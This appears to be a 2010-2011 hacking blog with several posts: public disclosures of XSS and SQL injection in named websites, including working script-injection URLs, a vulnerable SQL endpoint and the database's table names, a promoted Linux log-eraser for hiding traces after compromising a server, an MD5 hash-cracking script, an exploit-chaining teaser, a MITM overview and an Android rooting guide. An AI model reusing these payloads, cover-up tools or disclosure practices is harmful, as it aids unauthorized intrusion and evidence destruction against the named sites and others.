Ethical hacking and cyber security

XSS in Sonyericsson.com

Prashant — Mon, 20 Jun 2011 04:45:11 +0000

Sony has been in the news for the past few months. Its leading Play station network was hacked and information of millions of customers was stolen. After that, Sony’s networks and sites worldwide are facing attacks and data theft are being made. Be it hacktivist group Anonymous or notorious hacking group Lulzsec, none has left Sony untouched. But after all this security breaches, Sony isn’t learning from the mistakes it made. A few days back, I was just going through Sonyericsson’s official website looking for some handsets. So just thought of doing some manual audit of the website. And believe me, even a high school kid with hacking skills can find a vulnerability in the site within a minute!

HTTP header response using my python script

And Finally the XSS !

A search box tempted me and I got the most common and most used vulnerability in web applications, Cross site scripting aka XSS. Cross site scripting or XSS is a vulnerability in web applications and websites where an attacker can execute malicious script in the website during the run time and can use the website for phishing and stealing cookies etc. The attacker can execute malicous scripts on the webiste, thus tricking users and putting up traps like ajax keyloggers etc. The site didn’t have much to search for. Though a complete audit may result in more bugs and vulnerabilities. I think now Sony must gear up now. Its better to be secure then banging head on aftermath.

Linux Log Eraser v0.2

Prashant — Sat, 11 Jun 2011 09:34:00 +0000

Many of us need to clear our tracks and logs after hacking a server or penetration testing. Keeping this in mind, b0nd bro from Hackers Garage has coded a script in bash to earse logs and traces left on a Linux machine while or after compromising it.

Author: b0nd

site: http://garage4hackers.com

Features in ver 0.2:

1. Script has been redesigned from scratch. It’s more customizable now. Pay attention to the global variables declared and initialized at the top of code.
2. Non-interactive script: The interactive features might be painful on a remote connect or reverse shell.
3. Included features to Erase user activity logs from logs files (wtmp, utmp, lastlog etc)
4. Fetch the IP, spoof_ip, and user name to it. The script will take care to remove all entries of them from “editable” ascii files and would spoof all of them in binary files.
5. Fixed the error in deleting the log entries for the web back door shell from web logs.
6. Restore the time stamping for all the log files which have been accessed and edited.
7. Get some basic system info
8. Verify-IP: To inform user if by mistake he has entered invalid IP (It includes 3 different checks on user input)

This time, script being non-interactive, please play safe. The script is ready to go and can be used in your ventures!
Couple more things are running in back of my mind for the same concept. I will try to incorporate them soon in the existing code. Screen shots:

Download it from here: http://www.garage4hackers.com/showthread.php?979-Project-Linux-Log-Eraser-v0.2&p=4184#post4184

Quick way to root your android phone

Prashant — Fri, 10 Jun 2011 18:48:35 +0000

Sorry to all my readers , I was not able to blog for a long time as I was busy in personal life. But now I have come back and will try to update you all with interesting information security practices. Many of us have android mobile phones. And experimenting with new things is what we love to do. Few weeks back I was also searching something spicy to root my android device. Its just 1 and half month old, but still took the risk of playing with it. Many of us are confused that what will rooting do? Will it change the interface ! ?

Well I don’t think so ! Rooting your device will help you in installing non Market apps or just unlock your device easily. So lets move on further. While googling and going through some of the blogs, I got a tool “SuperOneClick root tool” to root android devices. (You can google it to download, else I’ll be posting my skydrive link in the end of post for convince) So no huge steps, just a few to go!

1. Connect your device to your system. Note: USB Debugging Mode should be on on your device.

2. Open the SuperOneClick root tool. Note: This will work only for 2.1 or 2.2 version. For gingerbread and honeycomb, you need to do some digging

3. Click root button, and the rooting process will start after that

4. After the completion , all must be curious to know whether our device got rooted or not.Well here’s the solution for it. Browse to android market on your device and search for “terminal emulator”

5. Install the application and open it. Now type in su in the console. If you get # symbol and a message flashing “granted super user privileges” , Congrats !!! your device has been rooted !!

6. Further, you can check for updates, non market apps on your phone as “super user” gets installed on your phone too. Browse your phone to view it

So this was a quick guide for beginners like me trying to play and root their device ! Hope it will help others too. Meanwhile the tool SuperOneClick is not available for Linux users For windows,You can download it form my skydrive here

Note: I have confirmed it from the service center that on rooting your device, you loose the warranty of it.

XSS and SQLi in tech2 website

Prashant — Thu, 06 Jan 2011 05:39:38 +0000

Tech2 is a famous tech show broadcasted on the CNN-IBN network channels. Long time back, I had found XSS and SQL injection in their site and had informed them. Again, I have got XSS and SQL injection bug in their site.

site: http://tech2.in.com

vulnerable xss links:

http://tech2.in.com/forums/index.php?sid=da6fea08c9b152d11604d9de6d1c67a6%22%3E%3Cscript%3Ealert%28%22LOXIans%22%29%3C/script%3E

http://tech2.in.com/seller_login_new.php?sourceurl=http://tech2.in.com/seller/seller_form_new.php%22%3E%3Cscript%3Ealert%28%22LOXIans%22%29%3C/script%3E

http://tech2.in.com/seller_login_new.php?sourceurl=http://tech2.in.com/seller/seller_detail.php?id=2475%22%3E%3Cscript%3Ealert%28%22LOXIans%22%29%3C/script%3E

Vulnerable SQLi link:

http://tech2.in.com/contest.php?contestid=832

Details:

Web Server: WEB18 SERVER SOFTWARE

DB Server: MySQL >=5

DB: qtech

Table names:

F1Y08022009,activity,adlogger_adcheck_logs,adlogger_blocklogs,adlogger_channels,adlogger_logfiles,adlogger_quickstats,adlogger_users,admin_action_log,admin_action_log_nov2010,allsitestechbox,apcbanner,author,bannerautorefr

Pics:

BANG—-> NASA again !!

Prashant — Thu, 06 Jan 2011 04:34:06 +0000

Yep. LOXians have hit NASA again. Last year “vinnu” bro had disclosed many SQL injection and XSS bugs in NASA and other US government departments. This time its NASA again with XSS and SQL injections bugs in their site.

Server: Jet Propulsion Laboratory, NASA

Bugs: SQL injection and XSS

Database Type: Mysql

Pics:

Micromax mobile’s website xssed

Prashant — Fri, 10 Dec 2010 17:58:03 +0000

Hello Friends. I was just browsing micromax’s website for their latest release, an android mobile A-60, the cheapest Android phone in the market. While browsing the site got few xss vulnerabilities. Hope they get patched soon before evil minds use them. Earlier many telecommunication giants like !dea cellular and sony ericsson etc. have been xssed and gone under sql injection attacks (check null|con for !dea sqli report)

Vulnerable links: http://www.micromaxinfo.com/product.php?product=modu-t&cat=Touch_Screen”>

http://www.micromaxinfo.com:80/product.php?cat=Touch_Screen&product=modu-t”>
XSSED(Legion Of XTRemers and Garage 4 hackers

pics:

Man-In-The-Middle attack (MITM)

Prashant — Thu, 02 Dec 2010 04:41:57 +0000

What is MITM ?
Lets have an example first. An attacker puts up a fake bank website and entices user to that website. User types in his password, and the attacker in turn uses it to access the bank’s real website. Done right, the user will never realize that he isn’t at the bank’s website. Then the attacker either disconnects the user and makes any fraudulent transactions he wants, or passes along the user’s banking transactions while making his own transactions at the same time.

Here’s what Wikipedia says “In cryptography, the man-in-the-middle attack (often abbreviated MITM), or bucket-brigade attack, or sometimes Janus attack, is a form of active eavesdropping in which the attacker makes independent connections with the victims and relays messages between them, making them believe that they are talking directly to each other over a private connection when in fact the entire conversation is controlled by the attacker. The attacker must be able to intercept all messages going between the two victims and inject new ones, which is straightforward in many circumstances (for example, an attacker within reception range of an unencrypted Wi-Fi wireless access point, can insert himself as a man-in-the-middle).”

A Man-in-the-middle attack can only be successful when the attacker can impersonate each endpoint to the satisfaction of the other. Most cryptographic protocols include some form of endpoint authentication specifically to prevent MITM attacks. For example, SSL authenticates the server using a mutually trusted certification authority.

Techniques
Various defenses against MITM attacks use authentication techniques that are based on: Public key infrastructures

Stronger mutual authentication

Secret keys (high information entropy secrets)

Passwords (low information entropy secrets)

Other criteria, such as voice recognition or other biometrics

Off-the-Record Messaging for instant messaging

Off-channel verification

Carry-forward verification

The integrity of public keys must generally be assured in some manner, but need not be secret. Passwords and shared secret keys have the additional secrecy requirement. Public keys can be verified by a Certificate Authority, whose public key is distributed through a secure channel (for example, with a web browser or OS installation). Public keys can also be verified by aweb of trust that distributes public keys through a secure channel (for example by face-to-face meetings).

Tools For Hacking

dsniff – A tool for SSH and SSL MITM attacks monkey6.

Cain – A Windows GUI tool which can perform MITM attacks, along with sniffing and ARP poisoning

Ettercap – A tool for LAN based MITM attacks

Karma – A tool that uses 802.11 Evil Twin attacks to perform MITM attacks AirJack – A tool that demonstrates 802.11 based MITM attacks

wsniff – A tool for 802.11 HTTP/HTTPS based MITM attacks an additional card reader and a method to intercept key-presses on an Automated teller machine

The MITM attack could also be done over an https connection by using the same technique; the only difference consists in the establishment of two independent SSL sessions, one over each TCP connection. The browser sets a SSL connection with the attacker, and the attacker establishes another SSL connection with the web server. In general the browser warns the user that the digital certificate used is not valid, but the user may ignore the warning because he doesn’t understand the threat. In some specific contexts it’s possible that the warning doesn’t appear, as for example, when the Server certificate is compromised by the attacker or when the attacker certificate is signed by a trusted CA and the CN is the same of the original web site.

Fusion of Xploits – Multiplexing exploitation

Prashant — Sat, 13 Nov 2010 09:56:06 +0000

Author : “vinnu”
Team : “Legion Of Xtremers”
Greeatz : Secfence team, Lord Deathstorm, Happy T3rminat0r, fb1h2s, b0nd

The worthiness of a single chance to exploit a specific victim cannot be compared with
anything else. And a hacker by hook-or-crook will never tend to loose even a little probability
of such a chance.

In such scenarios, normal exploitation strategies fail to cash-up such precious chances of exploitation.

But, why normal exploitation fail?

In kill-all type situation several exploits are bundled togather so as to achieve more chances of success of
remote code execution. But in some cases we cannot infer what vulnerable products are loaded on target victim box.

So in case of certain type of exploits; which need exclusive resources, one non-legitimate contender exploit
will cause failure of the eligible exploit. Such a situation is mostly faced with heap spray type exploits.
Though there are several other types also which behave in similar fashion.

In this paper, we’ll discus about the fusion of multiple heap spray based exploits in such a way that they will
execute under same roof (shared resource among them).

Some vulnerabilities, which gets trigerred by javascript and do not need any extra plugin or activeX component
are simplest cases to get triggerred in sequence.

But in case of fusion of exploits which use activeX components or plugins, we have to tackle few problems first
before triggering the vulnerability.

In this paper I am going to fuse Apple QuickTime Marshalled pUnk exploit and a zeroday of Adobe.

The whole paper can be read at garage 4 hackers forum. Click here

D4rk-cracker : A md5 cracker in python

Prashant — Sat, 13 Nov 2010 09:43:40 +0000

My friend D4rk357 made another brilliant tool in python. This time its “D4rk-cracker, a md5 hash cracker coded in python. This tool can easily be expanded by adding more online md5 crack resources .Below is the source code of the tool:

#!/usr/bin/python

# D4rk-cracker-- A small python code for MD5 cracking
# Coded By D4rk357[2010]

import urllib,urllib2, re,sys,cookielib
from socket import*

if len(sys.argv) != 2:
	print "\n|-----------------------------------------------------------------|"
        print "|          lastman100[@]gmail[dot]com                             |"
        print "|           10/2010     MD 5 Cracker    v0.1                      |"
	print "| Visit   : www.garage4hackers.com                                |"
        print "|-----------------------------------------------------------------|\n"

mhash= raw_input('please enter the hash to crack :')
params =  urllib.urlencode({'term':mhash})
f=urllib.urlopen("http://md5crack.com/crackmd5.php", params)
tas= f.read()
link=re.compile('Found: md5'+'\S+'+'\s+'+'\S+'+'\s+'+'\w+')

if link.search(tas):
	a= link.search(tas).group()
	print("[+]cracking...\n \n[+]Hash Cracked from md5crack.com \n")
	print a.strip('[Found,:]')
else:
	print "[+] Hash not found on md5crack.com\n"

params=urllib.urlencode({'oc_check_md5':mhash})
f=urllib.urlopen("http://opencrack.hashkiller.com/",params)
tas=f.read()
link=re.compile('result'+'.*'+'\S')
if link.search(tas):
	a= link.search(tas).group()
	print("\n[+]Hash Cracked from hashkiller.com \n")
	print a.strip('[result,",>,
]')
else:
	print "[+] \nHash not found on hashkiller.com\n"

params=urllib.urlencode({'search_field':mhash})
f=urllib.urlopen("http://hashchecker.com/index.php?_sls=search_hash",params)
tas=f.read()
link=re.compile('Your md5 hash is :'+'\S+'+'\s+'+'\S+'+'\s+'+'\S+')

if link.search(tas):
	a= link.search(tas).group()
	print("\n[+]Hash Cracked from hashchecker.com \n")
	print a.strip('[Your md5 hash is :,
,,,]')
else:
	print "[+] \nHash not found on hashchecker.com\n"

Link Extractor in Python

Prashant — Wed, 10 Nov 2010 11:45:46 +0000

D4rk357, my friend made a Link Extractor in python. A very useful tool to extratct links form website:

#!/usr/bin/python
 #A  small link extractor program .
import os,sys,urllib,re,httplib
if len(sys.argv) != 2:

print "\n|-----------------------------------------------------------------|"

print "|          lastman100[@]gmail[dot]com                             |"

print "|           10/2010     Link Extractor    v0.1                      |"

print "| Visit   : www.garage4hackers.com                                |"

print "|-----------------------------------------------------------------|\n"
ab=raw_input("enter URL to extract the link\n")

ht=re.compile("http://")

if ht.search(ab):

sa=urllib.urlopen(ab)

else:

sa=urllib.urlopen('http://'+ab)
st=sa.read()
link=re.compile('http\S\W+'+'\S+')
y =link.finditer(st)
for i in y:

print i.group()